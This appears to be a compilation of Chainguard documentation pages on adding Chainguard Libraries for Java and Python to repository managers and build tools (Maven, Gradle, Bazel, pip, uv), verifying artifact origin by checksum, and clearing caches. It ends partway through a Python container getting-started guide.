Select Repositories in the left hand navigation. Select the Virtual tab in the repositories view. Locate the java-all repository. Hover over the row and click the … in the last column on the right. Select Set Me Up in the dialog. Press Generate Token & Create Instructions. Copy the generated token value to use as the password for authentication. Press Generate Settings. Copy the value from a url field; they are all identical. For example, https://exampleorg.jfrog.io/artifactory/java-all/ with exampleorg replaced with the name of your organization. Use the URL of the virtual repository in the build configuration and build a first test project. In a working setup the java-chainguard remote repository contains all libraries retrieved from Chainguard. Sonatype Nexus Repository Sonatype Nexus Repository includes a maven-public repository group out of the box. It groups access to the Maven Central Repository from the maven-central repository with the internal maven-releases and maven-snapshot repositories. Refer to the Maven Repositories documentation for Nexus for more information. If you are using this group, you can add a proxy repository for the Chainguard Libraries for Java repository for production use. Initial configuration For initial testing and adoption it is advised to create a separate proxy repository for the Maven Central Repository, a separate proxy repository for the Chainguard Libraries for Java repository, and a separate repository group: Log in as a user with administrator privileges. Access the Server administration and configuration section with the gear icon in the top navigation bar. Configure a remote repository for the Maven Central Repository: Select Repository - Repositories in the left hand navigation. Press Create repository. Select the maven2 (proxy) recipe. Provide a new name java-public. Ensure Maven 2 - Version policy is set to Release. In the Proxy - Remote storage input add the URL https://repo1.maven.org/maven2/. Press Create repository. Configure a remote repository for the Chainguard Libraries for Java repository: Select Repository - Repositories in the left hand navigation. Press Create repository. Select the maven2 (proxy) recipe. Provide a new name java-chainguard. Ensure Maven 2 - Version policy is set to Release. In the Proxy - Remote storage input add the URL https://libraries.cgr.dev/java/. In HTTP - Authentication with the Authentication type username, provide the username and password values as retrieved with chainctl. Press Create repository. Create a new repository group and add the two repositories: Select Repository - Repositories in the left hand navigation. Press Create repository. Select the maven2 (group) recipe. Provide a new name java-all. In the section Group - Member repositories, move the new repositories java-public and java-chainguard to the right and move the java-chainguard repository to the top of the list with the arrow control. Build tool access The following steps allow you to determine the URL and authentication details for accessing the repository: Click Browse in the Welcome view or the browse icon (cube) in the top navigation bar. Locate the URL column for the java-all repository group and press copy. For example, https://repo.example.com/repository/java-all/ with repo.example.com replaced with the hostname of your repository manager. Copy the URL in the dialog. Use your configured username and password unless Security - Anonymous Access - Access - Allow anonymous users to access the server is activated.
Details vary based on your configured authentication system. Use the URL of the repository group, such as https://repo.example.com/repository/java-all/ or https://repo.example.com/repository/maven-public/ in the build configuration and build a first test project. In a working setup the java-chainguard proxy repository contains all libraries retrieved from Chainguard. --- ### Global Configuration URL: https://edu.chainguard.dev/chainguard/libraries/python/global-configuration/ Last Modified: April 7, 2025 Tags: Chainguard Libraries, Python Python library consumption in a large organization is typically managed by a repository manager. Commonly used repository manager applications are Cloudsmith, JFrog Artifactory, and Sonatype Nexus Repository. The repository manager acts as a single point of access for developers and development tools to retrieve the required libraries. At a high level, adopting the use of Chainguard Libraries consists of the following steps: Add Chainguard Libraries as a remote repository for library retrieval. Add the public PyPI repository as a remote repository. Create a group, virtual, or polyglot repository combining these repository sources with any desired internal repositories. Configure the Chainguard Libraries repository as the first choice for any library access after any desired internal repositories. You should also: Remove all prior cached artifacts in the virtual server or proxy public repository. This step reduces confusion about the origin of libraries and assists technical evaluation and adoption of Chainguard Libraries. Remove any repositories that are no longer desired or necessary. Depending on your library requirements, this step can result in removal of some proxy repositories or even removal of all proxy repositories. If your organization does not use a repository manager, you can still use Chainguard Libraries. However, this approach requires configuration of multiple build and development platforms and utilities to use Chainguard Libraries. For this reason, adopting the use of a repository manager is the recommended approach. Cloudsmith Cloudsmith supports Python repositories for proxying and hosting and polyglot repositories that combine multiple repositories sources with compatible formats. Refer to the Cloudsmith Python Repository documentation and the Cloudsmith documentation for creating a repository for more information. Initial configuration Use the following steps to add a repository with both Chainguard Libraries for Python and PyPI as upstream sources. First, create a repository: Log in to your Cloudsmith instance as user with administrator privileges. Select the Repositories tab near the top of the screen. Navigate to the Repositories Overview, then select + New repository. At the new repository form, enter the name python-all for your new repository. The name should include python to identify the repository format. This convention helps avoid confusion, since repositories in Cloudsmith are multi-format. Select a storage region that is appropriate for your organization and infrastructure. Select + Create Repository. Next, configure the upstream proxies: Select the name of the new python-all repository on the repositories page to configure it. Access the Upstreams tab and click + Add Upstream Proxy. Configure an upstream proxy with the format python and the following details: Name: python-chainguard Priority: 1 Upstream URL: https://libraries.cgr.dev/python/ Mode: Cache and Proxy Select Create Upstream Proxy. 
Configure another upstream proxy with the following details Name: python-public Priority: 2 Upstream URL: https://pypi.org/ Mode: Cache and Proxy Select Create Upstream Proxy. Build tool access See the page on build tool configuration for Chainguard Libraries for Python for information on accessing credentials and setting up build tools. JFrog Artifactory JFrog Artifactory supports PyPI repositories for proxying and virtual repositories to combine multiple sources into a single repository. The following instructions are based on the PyPI Repository documentation for Artifactory. Initial configuration Use the following steps to add the Chainguard Libraries for Python index and the PyPI public index as remote repositories and combine them as a virtual repository: Log in as a user with administrator privileges. Press Administration in the top navigation bar. Select Repositories in the left hand navigation. Configure a remote repository for the Chainguard Libraries for Python index: Select Create a Repository and choose the Remote option. Select PyPI as the Package type. Set the Repository Key to python-chainguard. Set the URL to https://libraries.cgr.dev/python/. Set User Name and Password / Access Token to the values as retrieved with chainctl. Check the Enable Token Authentication checkbox. Set the Pypi Settings - Registry URL to https://libraries.cgr.dev/python/. Access the Advanced configuration tab and deactivate the Block Mismatching Mime Types setting in the Others section. Press Create Remote Repository. Configure a remote repository for the PyPI public index: Select Create a Repository and choose the Remote option. Select PyPI as the Package type. Set the Repository Key to python-public. Set the URL to https://files.pythonhosted.org. Set the Pypi Settings - Registry URL to https://pypi.org/. Select Create Remote Repository. Combine the two repositories in a new virtual repository: Press Create a Repository and choose the Virtual option. Select PyPI as the Package type. Set the Repository Key to python-all. In the Repositories section, find the python-chainguard and python-public repositories. Ensure the python-chainguard repository is the first in the displayed list. Use the icon on the right of the repository name to drag and drop repositories into the desired position. Select Create Virtual Repository. At this point, you have a virtual repository set up in Artifactory that allows you or others in your organization to access Chainguard Libraries for Python with your chosen tools. This setup falls back to the public PyPI index in cases where a package is not available in Chainguard’s index. Build tool access See the page on build tool configuration for Chainguard Libraries for Python for information on accessing credentials and setting up build tools. Sonatype Nexus Repository Sonatype Nexus Repository allows for merging multiple remote repositories as a repository group. The below instructions for are based on the Nexus documentation for PyPI Initial configuration The following steps create remote repositories for Chainguard Libraries for Python, a remote repository for the public PyPI index, and a repository group combining these sources. First, log in to Sonatype Nexus as a user with administrator privileges and access the Server administration and configuration section within the gear icon in the top navigation bar. Next, configure a remote repository for the public PyPI index: Select Repository - Repositories in the left hand navigation. Select Create repository. 
Select the PyPI (proxy) recipe. Provide a new name, such as python-public. In the Proxy - Remote storage field, add the following URL: https://pypi.org/. Select Create repository. Configure a remote repository for the Chainguard Libraries for Python repository: Select Repository - Repositories in the left hand navigation. Select Create repository. Select the PyPI (proxy) recipe. Provide a new name, such as python-chainguard. In the Proxy - Remote storage field, add the following URL: https://libraries.cgr.dev/python/. In HTTP - Authentication, set the Authentication type to username and enter the username and password values as retrieved with chainctl. Select Create repository. Finally, create a new repository group and add the two repositories: Select Repository - Repositories in the left hand navigation. Select Create repository. Select the PyPI (group) recipe. Provide a new name, such as python-all. In the section Group - Member repositories, move the new repositories python-public and python-chainguard to the right and move the python-chainguard repository to the top of the list with the arrow control. Build tool access See the page on build tool configuration for Chainguard Libraries for Python for information on accessing credentials and setting up build tools. --- ### Build Configuration URL: https://edu.chainguard.dev/chainguard/libraries/java/build-configuration/ Last Modified: April 21, 2025 Tags: Chainguard Libraries, Java The configuration for the use of Chainguard Libraries depends on your build tools, continuous integration, and continuous deployment setups. At a high level, adopting the use of Chainguard Libraries consists of the following steps: Remove local caches on workstations and CI/CD pipelines. This step ensures that any libraries that were already sourced from other repositories are requested again and the version from Chainguard Libraries is used instead of other binaries. Change configuration to access Chainguard Libraries via your repository manager after the changes from the global configuration are implemented. These changes must be performed on all workstations of individual developers and other engineers running relevant application builds. They must also be performed on any build server such as Jenkins, TeamCity, GitHub, or other infrastructure that builds the applications or otherwise downloads and uses relevant libraries. Cloudsmith Build configuration to retrieve artifacts from Cloudsmith requires you to authenticate. Use your username and password for Cloudsmith in your build tool configuration. Follow the steps from the global configuration to determine the URL and authentication details. JFrog Artifactory Build configuration to retrieve artifacts from Artifactory typically requires you to authenticate and use the identity token in the configuration of your build tool. Follow the steps from the global configuration to determine the URL and authentication details. Sonatype Nexus Repository Build configuration to retrieve artifacts from Nexus may require authentication. Use your username and password for Nexus in your build tool configuration. Follow the steps from the global configuration to determine the URL and authentication details. Apache Maven Apache Maven is the most widely used build tool in the Java ecosystem. Remove Maven caches Apache Maven uses a local cache of libraries. When adopting Chainguard Libraries for Java you must delete that local cache so that libraries are downloaded again.
By default the cache, also known as the local repository, is located in a hidden .m2/repository directory in your user’s home directory. Use the following command to delete it: rm -rf ~/.m2/repository Change Maven configuration Before running a new build you must configure access to Chainguard Libraries for Java. If the administrator for your organization’s repository manager created a new repository or virtual repository or group repository, you must update your settings defined in ~/.m2/settings.xml. A typical setup defines a global mirror (id ecosystems) for all artifacts and configures the URL of the repository group or virtual repository from your repository manager https://repo.example.com/group/. Since the group or virtual repository combines release and snapshot artifacts you must override the built-in central repository and its configuration in an automatically activated profile. <settings> <mirrors> <mirror> <!-- Set the identifier for the server credentials for repository manager access --> <id>chainguard-maven</id> <!--Send all requests to the repository manager --> <mirrorOf>*</mirrorOf> <url>https://repo.example.com/repository/group</url> <!-- Cloudsmith example --> <!-- <url>https://dl.cloudsmith.io/basic/exampleorg/chainguard-maven/maven/</url> --> <!-- JFrog Artifactory example --> <!-- <url>https://example.jfrog.io/artifactory/chainguard-maven/</url> --> <!-- Sonatype Nexus example --> <!-- <url>https://repo.example.com:8443/repository/chainguard-maven/</url> --> </mirror> </mirrors> <!-- Activate repo manager and override central repo from Maven itself with invalid URLs --> <activeProfiles> <activeProfile>repo-manager</activeProfile> </activeProfiles> <profiles> <profile> <id>repo-manager</id> <repositories> <repository> <id>central</id> <url>http://central</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>true</enabled> </snapshots> </repository> </repositories> <pluginRepositories> <pluginRepository> <id>central</id> <url>http://central</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>true</enabled> </snapshots> </pluginRepository> </pluginRepositories> </profile> </profiles> </settings> If your repository manager requires authentication, you must specify credentials for the server. The id value in the server element must match the id value in the mirror configuration - chainguard-maven in the example. The username and password values vary depending on the repository manager and the configured authentication, contact the administrator and refer to the global configuration documentation. <settings> ... <servers> <server> <id>chainguard-maven</id> <username>YOUR_USERNAME_FOR_REPOSITORY_MANAGER</username> <password>YOUR_PASSWORD</password> </server> </servers> </settings> Note that you can use a secret manager application to populate the credentials for each user on their workstation as well as for service applications in your CI/CD pipelines into environment variables, for example CHAINGUARD_JAVA_IDENTITY_ID and CHAINGUARD_JAVA_TOKEN. You can then use an identical server configuration, and therefore settings file, for all users: <settings> ... <servers> <server> <id>chainguard-maven</id> <username>${env.CHAINGUARD_JAVA_IDENTITY_ID}</username> <password>${env.CHAINGUARD_JAVA_TOKEN}</password> </server> </servers> </settings> Refer to the official documentation for the Maven settings file for more details. 
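Once the settings file is in place, one way to sanity-check the setup is to clear the local cache and run a build with forced updates, then watch the download log lines for the mirror id from the example above (chainguard-maven). The following is a minimal sketch that assumes the environment-variable approach shown earlier and an existing Maven project; the variable values are placeholders, so adjust them and the project to your own setup:

```sh
# Placeholder values; use the credentials from your repository manager or pull token
export CHAINGUARD_JAVA_IDENTITY_ID="<your-identity-id>"
export CHAINGUARD_JAVA_TOKEN="<your-token>"

# Start from an empty local repository so every artifact is resolved again
rm -rf ~/.m2/repository

# Force Maven to re-check remote repositories; downloads should then be logged as
# "Downloading from chainguard-maven: <repository manager URL>..."
mvn -U clean verify
```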
If the administrator only re-configured the existing repository group or virtual repository, you can trigger a build to initiate use of Chainguard Libraries for Java. If your organization does not use a repository manager, you can configure access to the Chainguard Libraries for Java repository directly in your settings or pom.xml files. Note that the order of the repositories in these files is significant: the Chainguard repository must be located at the top of the list, above the necessary override for the built-in central repository and any other repositories. The following listing shows a complete ~/.m2/settings.xml file with the desired configuration and placeholder values CG_PULLTOKEN_USERNAME and CG_PULLTOKEN_PASSWORD or environment variables for the pull token detailed in Chainguard Libraries Access: <settings> <activeProfiles> <activeProfile>chainguard-maven</activeProfile> </activeProfiles> <profiles> <profile> <id>chainguard-maven</id> <repositories> <repository> <id>chainguard</id> <url>https://libraries.cgr.dev/java/</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>false</enabled> </snapshots> </repository> <repository> <id>central</id> <url>https://repo1.maven.org/maven2/</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>false</enabled> </snapshots> </repository> </repositories> <pluginRepositories> <pluginRepository> <id>chainguard</id> <url>https://libraries.cgr.dev/java/</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>false</enabled> </snapshots> </pluginRepository> <pluginRepository> <id>central</id> <url>https://repo1.maven.org/maven2/</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>false</enabled> </snapshots> </pluginRepository> </pluginRepositories> </profile> </profiles> <servers> <server> <id>chainguard</id> <!-- pick up values from environment variables --> <username>${env.CHAINGUARD_JAVA_IDENTITY_ID}</username> <password>${env.CHAINGUARD_JAVA_TOKEN}</password> <!-- or use literal values --> <!-- <username>CG_PULLTOKEN_USERNAME</username> --> <!-- <password>CG_PULLTOKEN_PASSWORD</password> --> </server> </servers> </settings> The preceding settings file affects all projects built on the machine where the file is configured. Alternatively, you can add the repositories and pluginRepositories to individual project pom.xml files. Authentication details must remain within the settings file. Gradle Gradle is a commonly used build tool in the Java ecosystem. Remove Gradle caches Gradle uses a local cache of libraries. When adopting Chainguard Libraries for Java you must delete that local cache so that libraries are downloaded again. By default the cache is located in a hidden .gradle/caches directory in your user's home directory. Use the following command to delete it: rm -rf ~/.gradle/caches/ Gradle can also be configured to use a local Maven repository with a repository configuration in the global init.gradle or a project-specific build.gradle file: repositories { ... mavenLocal() } If this configuration is used, be sure to delete the local Maven repository as well. Change Gradle configuration Before running a new build you must configure access to the Chainguard Libraries for Java.
If the administrator for your organization's repository manager created a new repository, virtual repository, or group repository, you must update your Gradle configuration. Artifact download in Gradle can be configured in an init script using the repositories definition. Each project can also declare repositories separately. A typical setup removes the direct reference to Maven Central mavenCentral() and any other repositories, and adds a replacement definition with the URL of the repository group or virtual repository from your repository manager (for example, https://repo.example.com/group/) and any applicable authentication details. repositories { maven { url = uri("https://repo.example.com/group/") credentials { username = "YOUR_USERNAME_FOR_REPOSITORY_MANAGER" password = "YOUR_PASSWORD" } } } Example URLs for repository managers: Cloudsmith: https://dl.cloudsmith.io/basic/exampleorg/chainguard-maven/maven/ JFrog Artifactory: https://example.jfrog.io/artifactory/chainguard-maven/ Sonatype Nexus: https://repo.example.com:8443/repository/chainguard-maven/ If your organization does not use a repository manager, you can configure the Chainguard Libraries for Java repository with the credentials from Chainguard Libraries Access, replacing the placeholders CHAINGUARD_JAVA_IDENTITY_ID and CHAINGUARD_JAVA_TOKEN. Ensure that the Chainguard repository is located above the mavenCentral repository and any other repositories: repositories { maven { url = uri("https://libraries.cgr.dev/java/") credentials { username = "CHAINGUARD_JAVA_IDENTITY_ID" password = "CHAINGUARD_JAVA_TOKEN" } } mavenCentral() } Alternatively, configure environment variables and access the values: repositories { maven { url = uri("https://libraries.cgr.dev/java/") credentials { username = "$System.env.CHAINGUARD_JAVA_IDENTITY_ID" password = "$System.env.CHAINGUARD_JAVA_TOKEN" } } mavenCentral() } The following listing shows a valid init.gradle file. It wraps the repositories element with allprojects so that the scope of the file affects all projects built locally with Gradle. It also allows for downloads for plugins and build scripts from the remote URL using buildscript. Lastly, the example shows use of an internal repository manager that only serves artifacts without authentication, using HTTP only. Because plain HTTP is not advisable unless other network controls make its use safe, the explicit allowInsecureProtocol property is required: allprojects { buildscript { repositories { maven { url = "http://repo.example.com:8081/repository/chainguard-maven/" allowInsecureProtocol = true } } } repositories { maven { url = "http://repo.example.com:8081/repository/chainguard-maven/" allowInsecureProtocol = true } } } Bazel Bazel is a fast, scalable, and extensible build tool commonly used in large-scale projects. Remove Bazel caches Bazel uses a cache to store downloaded artifacts. When adopting Chainguard Libraries for Java, you must delete this cache to ensure that libraries are downloaded again. By default, the cache is located in the .cache/bazel directory in your user's home directory on Linux, or in /private/var/tmp/_bazel_$USER on macOS. Use the following command to delete it: bazel clean --expunge The Bazel documentation on output directories contains further details. Change Bazel configuration Before running a new build, you must configure access to Chainguard Libraries for Java.
If the administrator for your organization’s repository manager created a new repository or virtual repository, you must update your Bazel configuration to use the repository manager. Bazel uses MODULE.bazel files to define external dependencies as artifacts. You can configure a Maven repository for artifact retrieval using repositories from the rules_jvm_external rule: Following is an example configuration for a repository manager: bazel_dep(name = "rules_jvm_external", version = "6.3") maven = use_extension("@rules_jvm_external//:extensions.bzl", "maven") maven.install( name = "maven", # Example dependencies to retrieve artifacts = [ "com.google.guava:guava:32.0.1-jre", "org.slf4j:slf4j-api:2.0.5", "ch.qos.logback:logback-classic:1.4.7", ], repositories = [ # To use Chainguard Libraries for Java via a repository manager: "https://repo.example.com/repository/chainguard-maven/", ], # Uncomment and configure authentication if needed: # auth = { # "https://repo.example.com/repository/chainguard-maven/": { # "type": "basic", # "username": "YOUR_USERNAME_FOR_REPOSITORY_MANAGER", # "password": "YOUR_PASSWORD", # }, # }, ) use_repo(maven, "maven") Example URLs for repository managers: Cloudsmith: https://dl.cloudsmith.io/basic/exampleorg/chainguard-maven/maven/ JFrog Artifactory: https://example.jfrog.io/artifactory/chainguard-maven/ Sonatype Nexus: https://repo.example.com:8443/repository/chainguard-maven/ If your organization does not use a repository manager, you can configure the Chainguard Libraries for Java repository directly, and include the Maven Central repository as fallback. Replace the placeholders CHAINGUARD_JAVA_IDENTITY_ID and CHAINGUARD_JAVA_TOKEN with the credentials provided by Chainguard: maven.install( name = "maven", # Example dependencies to retrieve artifacts = [ "com.google.guava:guava:32.0.1-jre", "org.slf4j:slf4j-api:2.0.5", "ch.qos.logback:logback-classic:1.4.7", ], repositories = [ # To use Chainguard Libraries directly (requires credentials): "https://libraries.cgr.dev/java/", # Use Maven Central as fallback "https://repo1.maven.org/maven2/", ], auth = { "https://libraries.cgr.dev/java/": { "type": "basic", "username": "CHAINGUARD_JAVA_IDENTITY_ID", "password": "CHAINGUARD_JAVA_TOKEN", }, }, ) Ensure that the Chainguard repository is listed before any other repositories to prioritize it for artifact retrieval. For more complex Bazel setups, you can use .netrc for authentication. Refer to the official Bazel documentation for rules_jvm_external for more detailed configuration options. Other build tools Other build tools such as Apache Ant with the Maven Artifact Resolver Ant Tasks, sbt, Leiningen and others use Maven or Gradle caches or similar approaches. Refer to the documentation of your specific tool and the preceding sections to determine how to remove any used caches. These tools also include their own mechanisms to configure repositories for binary artifact retrieval. Consult the specific documentation and adjust your configuration to use your repository manager and newly created repository group or virtual repository. 
Example URLs for repository managers: Cloudsmith: https://dl.cloudsmith.io/basic/exampleorg/chainguard-maven/maven/ JFrog Artifactory: https://example.jfrog.io/artifactory/chainguard-maven/ Sonatype Nexus: https://repo.example.com:8443/repository/chainguard-maven/ --- ### Build Configuration URL: https://edu.chainguard.dev/chainguard/libraries/python/build-configuration/ Last Modified: April 7, 2025 Tags: Chainguard Libraries, Python The configuration for the use of Chainguard Libraries depends on how you’ve set up your build tools and CI/CD workflows. At a high level, adopting the use of Chainguard Libraries in your development, build, and deployment workflows involves the following steps: If you or an administrator have not done so already, set up your organization’s repository manager to use Chainguard Libraries for Python. Log into your organization’s repository manager and retrieve credentials for the build tool you are configuration. Configure your development or build tool with this information. Remove local caches on workstations and CI/CD pipelines. This step ensures that dependencies are preferentially sourced from Chainguard Libraries. Finally, confirm that your development tools and CI/CD workflows are correctly ingesting dependencies from Chainguard Libraries. These changes must be performed on all workstations of individual developers and other engineers running relevant application builds. They must also be performed on any build tool such as Jenkins, TeamCity, GitHub Actions, or other infrastructure that draws in dependencies. Retrieving authentication credentials To configure any build tool, you must first access credentials from your organization’s repository manager. Cloudsmith The following steps allow you to determine the URL and authentication details for accessing your organization’s Cloudsmith repository manager. Log into Cloudsmith. Select the Repositories tab and click on the python-all repository. Select the Packages tab. Select Push/Pull Packages on the right. Choose the Python format. Select your desired authentication method for Entitlement tokens and copy the URL to use in your build tool - for example https://dl.cloudsmith.io/.../exampleorg/python-all/python/simple/. In the URL ... is replaced with a default token or your personal token depending on your selection and exampleorg is replaced with the name of your organization. The URL contains both the name of the repository python-all as well as python as an identifier for the format. Alternatively, use the API Key and copy the URL to use in your build tool for example https://username:{{apiKey}}@dl.cloudsmith.io/basic/exampleorg/python-all/python/simple/. Replace username and exampleorg with your Cloudsmith details and replace {{apiKey}} with the API key from the Personal API Keys section from the drop down on your username. Note that for use with build tools you must include the simple/ context so that the package index is used successfully. JFrog Artifactory The following steps allow you to determine the identity token and URL for accessing your organization’s JFrog Artifactory repository manager. Select Administration in the top navigation bar. Select Repositories in the left hand navigation. Select the Virtual tab in the repositories view. Locate the python-all* repository row and press the three dots (…) in the last column on the right. Select Set Me Up in the dialog. Select Generate Token & Create Instructions Copy the generated token value to use as the password for authentication. 
Select Generate Settings. Copy the value from one of the URL fields. They are all identical. For example, https://exampleorg.jfrog.io/artifactory/python-all with exampleorg. Note that for use with build tools you must append simple/ to the URL so that the package index is used successfully - https://exampleorg.jfrog.io/artifactory/python-all/simple/. Sonatype Nexus Repository The following steps allow you to determine the URL and authentication details for accessing your organization’s Sonatype Nexus repository group. Click Browse in the Welcome view or the browse icon (cube) in the top navigation bar. Locate the URL column for the python-all repository group and press copy. The URL should take the following format: https://repo.example.com/repository/python-all/. Note that for use with build tools you must append simple/ to the URL so that the package index is used successfully - https://repo.example.com/repository/python-all/simple/. No further configuration is necessary if your repository manager is configured for anonymous access with Security - Anonymous Access - Access - Allow anonymous users to access the server is activated. If authentication is required, you must use the relevant details such as username and password in your build tool configuration. Configuring build tools Once you have credentials and the index URL from your organization’s repository manager, you’re ready to set up specific build tools for local development or CI/CD. Authentication pip, uv, poetry, and other Python build and packaging tools have dedicated support for configuring authentication to the repository manager or the Chainguard Libraries for Python directly. As an alternative that works across tools and is often preferred, use .netrc for authentication. pip The pip tool is the most widely used utility for installing Python packages. In this section, we use the credentials from your organization’s repository manager to configure pip to ingest dependencies from Chainguard Libraries. First, let’s clear your local pip cache to ensure that packages are sourced from Chainguard Libraries for Python: pip cache purge To update pip to use our repository manager’s URL globally, create or edit your ~/.pip/pip.conf file. You may need to create the ~/.pip folder as well. For example: mkdir -p ~/.pip nano ~/.pip/pip.conf Update this configuration file with the following, replacing <repository-url> with the URL provided by your repository manager including the simple/ context: [global] index-url = <repository-url> Updating this global configuration affects all projects built on the workstation. Alternately, if your project uses a requirements.txt file in projects, you can add the following to it to configure on a project-by-project basis: --index-url <repository-url> package-name==version Note the different syntax for index-url in the two files. Refer to the official documentation for configuring authentication with pip if you are not using .netrc for authentication. uv uv is a fast Python package and project manager written in Rust. It uses PyPI by default, but also supports the use of alternative package indexes. To update your global configuration to use your organization’s repository manager with uv, create or edit the ~/.config/uv/uv.toml configuration file. You may also need to create the ~/.config/uv/ folder first. 
For example: mkdir -p ~/.config/uv nano ~/.config/uv/uv.toml Add the following to your uv global configuration file: [[tool.uv.index]] name = "<repository-manager-name>" url = "<repository-url>" Add the name for your repository, such as corppypi, within the quotes. Replace the <repository-url> with the URL provided by your repository manager including the simple/ context. Note that updating the global configuration affects all projects built on the workstation. Alternately, you can update each project by adding the same configuration in pyproject.toml. Refer to the official documentation for configuring authentication with uv and using alternative package indexes if you are not using .netrc for authentication. --- ### Management and Maintenance URL: https://edu.chainguard.dev/chainguard/libraries/java/management/ Last Modified: April 3, 2025 Tags: Chainguard Libraries, Java After the initial global configuration and build configuration, the use of Chainguard Libraries for Java proceeds transparently. Newly used artifacts from new projects, as well as new artifact versions, are automatically retrieved from the Chainguard repository as they become available, and the Maven Central Repository and other configured repositories serve as a backstop to provide any additionally needed artifacts. The following sections detail optional management, maintenance, and auditing steps on the repository manager and the build tool. Source verification You can verify what artifacts are retrieved from the Chainguard Libraries repository on a global level: Browse the chainguard proxy repository on your Artifactory or Nexus server. Access the Packages tab of the repository on your Cloudsmith instance. Filter the package list by the tag value carrying the name of your upstream proxy for Chainguard, for example tag:chainguard. The tag uses the name of the upstream proxy, with spaces replaced with dashes. Use the browsing access to locate specific artifacts and identify their name, file size, checksum values, timestamp and other identifiers. With these details you can verify your library use in the following locations: Local cache repositories on developer workstations Cache repositories in your CI pipeline Libraries in your application bundles Installed applications on your hosts or in your container images Checksums are a uniquely identifying characteristic of library artifacts. Unlike filenames and timestamps, checksums do not change in the use of libraries during an application build or the assembly of a deployment artifact like a tarball or container. This allows you to identify a library artifact by determining the checksum and then locating it in your repository manager. Calculate the different commonly used sums for a file example.jar with the following commands and output examples: $ sha1sum example.jar aea83e64ebec6a37e0be100f968a55fb381143c2 example.jar $ sha256sum example.jar 87a25c44e0fdb0c71e898c57f67b236d2205bfa76a25dbbb9779ebe2f93e787e example.jar $ md5sum example.jar fefd660ddc795900d48bdf49c17b3135 example.jar Use the search features in your repository manager, such as Sonatype Nexus, to locate the library. For the specific example, you find that the checksums correspond to the file junit-4.13.2.jar found in junit/junit/4.13.2/ and that the artifact is found in the chainguard proxy repository.
You can therefore conclude that the example.jar file originates from Chainguard, was built in the Chainguard Factory from source, and is available at https://libraries.cgr.dev/java/junit/junit/4.13.2/junit-4.13.2.jar. You can manually download the file to compare, if desired. Increase Chainguard Library use The number of available artifacts in Chainguard Libraries for Java increases over time. If an artifact was already retrieved from the Maven Central Repository and is available in your repository manager or local repository, it is not automatically replaced with the equivalent Chainguard Library version. You can force a download of new libraries by erasing them from your local repositories on your workstations and the Maven Central proxy repository in your repository manager. Both these repositories are caches only and it is therefore safe to delete them. After the deletion any new build retrieves the artifact again and attempts to download from the Chainguard repository. As a result, newly available artifacts replace old artifacts that originated from Maven Central and your use of Chainguard Libraries increases. For a more fine-grained approach, you can also delete subsections of local repositories and the proxy repositories. --- ### Management and Maintenance URL: https://edu.chainguard.dev/chainguard/libraries/python/management/ Last Modified: April 3, 2025 Tags: Chainguard Libraries, Python After the initial global configuration and build configuration, the use of Chainguard Libraries for Python proceeds transparently. Newly used artifacts from new projects, as well as new artifact versions, are automatically retrieved from the Chainguard repository as they become available, and the PyPI repository and other configured repositories serve as a backstop to provide any additionally needed artifacts. The following sections detail optional management, maintenance, and auditing steps on the repository manager and the build tool. Source Verification You can verify what artifacts are retrieved from the Chainguard Libraries repository on a global level: Browse the chainguard proxy repository on your Artifactory or Nexus server. Access the Packages tab of the repository on your Cloudsmith instance. Filter the package list by the tag value carrying the name of your upstream proxy for Chainguard, for example tag:chainguard. The tag uses the name of the upstream proxy, with spaces replaced with dashes. Use the browsing access to locate specific artifacts and identify their name, file size, checksum values, timestamp and other identifiers. With these details you can verify your library use in the following locations: Local cache repositories on developer workstations Cache repositories in your CI pipeline Libraries in your application bundles Installed applications on your hosts or in your container images Increase Chainguard Library Use The number of available artifacts in Chainguard Libraries for Python increases over time. If an artifact was already retrieved from the PyPI Repository and is available in your repository manager or local repository, it is not automatically replaced with the equivalent Chainguard Library version. You can force a download of new libraries by erasing them from your local repositories on your workstations and the PyPI proxy repository in your repository manager. Both these repositories are caches only and it is therefore safe to delete them. After the deletion any new build retrieves the artifact again and attempts to download from the Chainguard repository.
As a result, newly available artifacts replace old artifacts that originated from PyPI and your use of Chainguard Libraries increased. For a more fine-grained approach you can also delete subsections of local repositories and the proxy repositories. --- ### Getting Started with the Python Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/python/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The Python container images based on Wolfi and maintained by Chainguard provide distroless images that are suitable for building and running Python workloads. Chainguard offers both a minimal runtime image containing just Python, and a development image that contains a package manager and a shell. Because Python applications typically require the installation of third-party dependencies via the Python package installer pip, you may need to implement a multi-stage Docker build that uses the Python -dev image to set up the application. In this guide, we’ll cover two examples to showcase Python container images based on Wolfi as a runtime. In the first, we’ll use the minimal image containing just Python (which has access to the Python standard library), and in the second we’ll demonstrate a multi-stage build. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Example 1 — Minimal Python Chainguard Container In this example, we’ll build and run a distroless Python Chainguard Container in a single-stage build process. We’ll first make a demonstration app and then build and run it. Step 1: Setting up a Demo Application We’ll start by creating a basic command-line Python application to serve as a demo. This app will generate random octopus facts based on a list in a text file. This app will use the random module from the Python standard library. First, create a directory for your app. You can use any meaningful name and path for you, our example will use octo-facts/. mkdir ~/octo-facts/ && cd $_ Create a new file to serve as the application entry point. We’ll use main.py. You can edit this file in whatever code editor you would like. We’ll use Nano as an example. nano main.py The following Python script defines a light CLI app that takes in a text file, octo-facts.txt, and returns a random line from that file. '''Import random module to implement random.choice() function''' import random def random_line(text): '''Opens and reads lines of a UTF-8 encoded file, returning a random line''' with open(text, 'r', encoding='UTF-8') as file: line = file.readlines() return random.choice(line) def main(): '''Prints random line from facts.txt; verify your path''' print(random_line('facts.txt')) if __name__ == "__main__": main() Copy this code to your main.py script, save and close the file. 
